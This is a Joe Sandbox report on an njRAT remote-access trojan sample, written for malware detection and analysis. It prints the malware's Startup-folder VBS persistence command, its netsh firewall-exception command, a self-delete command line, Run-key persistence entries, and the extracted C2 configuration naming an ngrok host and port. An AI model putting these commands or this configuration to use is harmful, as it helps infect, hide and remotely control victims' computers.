Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nOZ2Oqnzbz.exe

Overview

General Information

Sample name:nOZ2Oqnzbz.exe
renamed because original name is a hash value
Original sample name:acb30a04da7096c99877b47f3050190d.exe
Analysis ID:1388810
MD5:acb30a04da7096c99877b47f3050190d
SHA1:89299ef483f4c276260193ae2fe4ab4f014c12aa
SHA256:43f9346f00f00794f88d0d23b096b19e6bbd95ac7bde24b2619e139e1a7cc239
Tags:exenjratRAT
Infos:

Detection

Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Yara detected Njrat
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to many ports of the same IP (likely port scanning)
Contain functionality to detect virtual machines
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Disables zone checking for all users
Drops PE files to the startup folder
Drops VBS files to the startup folder
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Sample uses process hollowing technique
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Uses netsh to modify the Windows network and firewall settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sigma detected: Wscript Shell Run In CommandLine
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • nOZ2Oqnzbz.exe (PID: 7116 cmdline: C:\Users\user\Desktop\nOZ2Oqnzbz.exe MD5: ACB30A04DA7096C99877B47F3050190D)
    • cmd.exe (PID: 6248 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nOZ2Oqnzbz.exe (PID: 6500 cmdline: C:\Users\user\Desktop\nOZ2Oqnzbz.exe MD5: ACB30A04DA7096C99877B47F3050190D)
      • WindowsServices.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" MD5: ACB30A04DA7096C99877B47F3050190D)
        • cmd.exe (PID: 6588 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WindowsServices.exe (PID: 1896 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: ACB30A04DA7096C99877B47F3050190D)
          • netsh.exe (PID: 6420 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7092 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WindowsServices.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" MD5: ACB30A04DA7096C99877B47F3050190D)
      • cmd.exe (PID: 5688 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WindowsServices.exe (PID: 6516 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: ACB30A04DA7096C99877B47F3050190D)
  • WindowsServices.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .. MD5: ACB30A04DA7096C99877B47F3050190D)
    • cmd.exe (PID: 5852 cmdline: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WindowsServices.exe (PID: 6400 cmdline: C:\Users\user\AppData\Local\Temp\WindowsServices.exe MD5: ACB30A04DA7096C99877B47F3050190D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
{"Campaign ID": "David", "Version": "0.7d", "Install Name": "bf497657d005804b657fde8dd2d0cb46", "Install Dir": "TEMP", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Host": "0.tcp.in.ngrok.io", "Port": "19208", "Network Seprator": "Y262SUCZ4UJJ"}
SourceRuleDescriptionAuthorStrings
00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
    00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Njrat_30f3c220unknownunknown
    • 0x5567:$a1: get_Registry
    • 0x6934:$a2: SEE_MASK_NOZONECHECKS
    • 0x6744:$a3: Download ERROR
    • 0x6a6c:$a4: cmd.exe /c ping 0 -n 2 & del "
    • 0x6a0c:$a5: netsh firewall delete allowedprogram "
    00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
    • 0x6964:$a1: netsh firewall add allowedprogram
    • 0x6934:$a2: SEE_MASK_NOZONECHECKS
    • 0x6af4:$b1: [TAP]
    • 0x6a6c:$c3: cmd.exe /c ping
    00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
    • 0x6934:$reg: SEE_MASK_NOZONECHECKS
    • 0x6720:$msg: Execute ERROR
    • 0x6780:$msg: Execute ERROR
    • 0x6a6c:$ping: cmd.exe /c ping 0 -n 2 & del
    00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
      Click to see the 83 entries
      SourceRuleDescriptionAuthorStrings
      21.1.WindowsServices.exe.400000.0.unpackJoeSecurity_NjratYara detected NjratJoe Security
        21.1.WindowsServices.exe.400000.0.unpackWindows_Trojan_Njrat_30f3c220unknownunknown
        • 0x5767:$a1: get_Registry
        • 0x6b34:$a2: SEE_MASK_NOZONECHECKS
        • 0x6944:$a3: Download ERROR
        • 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del "
        • 0x6c0c:$a5: netsh firewall delete allowedprogram "
        21.1.WindowsServices.exe.400000.0.unpackCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
        • 0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del "
        • 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2
        • 0x6966:$s3: Executed As
        • 0x5fb3:$s5: Stub.exe
        • 0x6944:$s6: Download ERROR
        • 0x6800:$s8: Select * From AntiVirusProduct
        21.1.WindowsServices.exe.400000.0.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
        • 0x6b64:$a1: netsh firewall add allowedprogram
        • 0x6b34:$a2: SEE_MASK_NOZONECHECKS
        • 0x6cf4:$b1: [TAP]
        • 0x6c6c:$c3: cmd.exe /c ping
        21.1.WindowsServices.exe.400000.0.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
        • 0x6b34:$reg: SEE_MASK_NOZONECHECKS
        • 0x6920:$msg: Execute ERROR
        • 0x6980:$msg: Execute ERROR
        • 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
        Click to see the 85 entries

        System Summary

        barindex
        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 1896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , ProcessId: 7092, ProcessName: wscript.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 1896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 1896, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ParentCommandLine: C:\Users\user\Desktop\nOZ2Oqnzbz.exe, ParentImage: C:\Users\user\Desktop\nOZ2Oqnzbz.exe, ParentProcessId: 6500, ParentProcessName: nOZ2Oqnzbz.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , ProcessId: 2668, ProcessName: WindowsServices.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , ProcessId: 7092, ProcessName: wscript.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 1896, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", CommandLine: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\nOZ2Oqnzbz.exe, ParentImage: C:\Users\user\Desktop\nOZ2Oqnzbz.exe, ParentProcessId: 7116, ParentProcessName: nOZ2Oqnzbz.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", ProcessId: 6248, ProcessName: cmd.exe

        Data Obfuscation

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6248, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
        Timestamp:192.168.2.43.6.98.23249754192082033132 02/08/24-06:54:17.203251
        SID:2033132
        Source Port:49754
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.98.23249753192082033132 02/08/24-06:53:47.167039
        SID:2033132
        Source Port:49753
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449740192082033132 02/08/24-06:52:40.778707
        SID:2033132
        Source Port:49740
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449750192082033132 02/08/24-06:53:17.004564
        SID:2033132
        Source Port:49750
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449745192082033132 02/08/24-06:52:56.886497
        SID:2033132
        Source Port:49745
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449746192082033132 02/08/24-06:53:02.654805
        SID:2033132
        Source Port:49746
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449735192082033132 02/08/24-06:52:19.109017
        SID:2033132
        Source Port:49735
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449736192082033132 02/08/24-06:52:23.314373
        SID:2033132
        Source Port:49736
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449748192082033132 02/08/24-06:53:09.670781
        SID:2033132
        Source Port:49748
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449737192082033132 02/08/24-06:52:28.873469
        SID:2033132
        Source Port:49737
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449743192082033132 02/08/24-06:52:53.287877
        SID:2033132
        Source Port:49743
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449747192082033132 02/08/24-06:53:05.744099
        SID:2033132
        Source Port:49747
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449742192082033132 02/08/24-06:52:48.846165
        SID:2033132
        Source Port:49742
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449739192082033132 02/08/24-06:52:37.039479
        SID:2033132
        Source Port:49739
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.98.23249751192082033132 02/08/24-06:53:22.365303
        SID:2033132
        Source Port:49751
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.18249755192082033132 02/08/24-06:54:57.629247
        SID:2033132
        Source Port:49755
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.98.23249752192082033132 02/08/24-06:53:27.364368
        SID:2033132
        Source Port:49752
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449738192082033132 02/08/24-06:52:32.434036
        SID:2033132
        Source Port:49738
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449741192082033132 02/08/24-06:52:45.605256
        SID:2033132
        Source Port:49741
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.43.6.115.6449749192082033132 02/08/24-06:53:13.881752
        SID:2033132
        Source Port:49749
        Destination Port:19208
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: nOZ2Oqnzbz.exeAvira: detected
        Source: 0.tcp.in.ngrok.ioAvira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeAvira: detection malicious, Label: BDS/Poison.mon
        Source: 12.2.WindowsServices.exe.400000.0.unpackMalware Configuration Extractor: Njrat {"Campaign ID": "David", "Version": "0.7d", "Install Name": "bf497657d005804b657fde8dd2d0cb46", "Install Dir": "TEMP", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Host": "0.tcp.in.ngrok.io", "Port": "19208", "Network Seprator": "Y262SUCZ4UJJ"}
        Source: 0.tcp.in.ngrok.ioVirustotal: Detection: 8%Perma Link
        Source: 0.tcp.in.ngrok.ioVirustotal: Detection: 8%Perma Link
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeReversingLabs: Detection: 86%
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeVirustotal: Detection: 86%Perma Link
        Source: nOZ2Oqnzbz.exeReversingLabs: Detection: 86%
        Source: nOZ2Oqnzbz.exeVirustotal: Detection: 86%Perma Link
        Source: Yara matchFile source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: nOZ2Oqnzbz.exe PID: 7116, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: nOZ2Oqnzbz.exe PID: 6500, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2668, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 1896, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 3484, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 6516, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 1868, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 6400, type: MEMORYSTR
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exeJoe Sandbox ML: detected
        Source: nOZ2Oqnzbz.exeJoe Sandbox ML: detected

        Compliance

        barindex
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeUnpacked PE file: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeUnpacked PE file: 12.2.WindowsServices.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeUnpacked PE file: 21.2.WindowsServices.exe.400000.0.unpack
        Source: nOZ2Oqnzbz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
        Source: Binary string: caspol.pdbx source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000004.00000003.1705907869.0000000000781000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000009.00000002.1738164335.000000000073E000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1941548771.000000000073E000.00000004.00000020.00020000.00000000.sdmp, nOZ2Oqnzbz.exe.0.dr, WindowsServices.exe.3.dr
        Source: Binary string: caspol.pdb source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000004.00000003.1705907869.0000000000781000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000009.00000002.1738164335.000000000073E000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1941548771.000000000073E000.00000004.00000020.00020000.00000000.sdmp, nOZ2Oqnzbz.exe.0.dr, WindowsServices.exe.3.dr
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

        Networking

        barindex
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49735 -> 3.6.115.64:19208
        Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49736 -> 3.6.115.64:19208
